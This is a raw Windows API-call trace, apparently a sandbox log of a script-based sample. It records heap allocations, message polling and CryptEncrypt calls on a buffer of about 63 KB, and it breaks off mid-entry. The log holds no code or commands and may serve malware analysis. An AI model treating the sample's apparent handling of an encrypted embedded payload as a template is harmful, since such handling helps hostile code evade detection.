1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0168.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0168.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0168.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0168.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0168.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0168.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0168.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0168.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0168.699] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0168.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0168.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0168.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0168.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0168.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0168.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0168.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0168.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0168.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0168.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b058 [0168.699] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0168.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0168.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0168.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0168.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0168.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0168.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0168.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0168.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0168.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0168.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0168.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0168.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0168.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0168.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0168.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0168.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0168.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0168.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0168.700] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0168.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0168.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0168.700] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0168.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0168.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0168.700] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.700] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.700] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0168.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0168.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0168.701] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0168.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0168.701] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0168.701] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0168.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0168.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.701] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.701] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0168.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0168.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0168.701] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.701] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0168.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.701] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0168.701] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0168.701] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.701] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0168.701] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0168.701] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0168.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0168.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0168.702] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.702] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0168.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0168.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0168.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0168.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0168.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.702] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.702] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0168.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0168.703] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0168.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0168.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0168.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0168.703] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xf77d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xf780) returned 1 [0168.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0168.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0168.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0168.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0168.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0168.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0168.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0168.703] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0168.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0168.703] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.703] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0168.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0168.703] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0168.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0168.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0168.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0168.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0168.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0168.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0168.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0168.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.707] CharLowerBuffW (in: lpsz="byte[63361]", cchLength=0xb | out: lpsz="byte[63361]") returned 0xb [0168.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0168.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0168.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0168.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0168.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0168.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0168.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0168.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0168.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0168.707] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0168.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0168.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0168.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0168.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0168.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0168.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0168.708] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0168.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0168.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0168.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0168.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0168.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.709] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.709] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0168.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0168.709] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0168.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0168.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0168.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0168.709] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa03820*, pdwDataLen=0x87e820*=0xf77d, dwBufLen=0xf780 | out: pbData=0xa03820*, pdwDataLen=0x87e820*=0xf780) returned 1 [0168.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0168.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0168.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0168.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0168.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0168.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0168.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0168.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0168.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0168.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0168.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0168.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0168.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0168.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0168.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0168.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0168.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0168.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0168.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0168.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0168.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0168.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0168.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0168.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0168.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0168.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0168.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0168.710] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0168.710] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0168.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.711] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0168.711] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0168.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0168.711] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.711] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 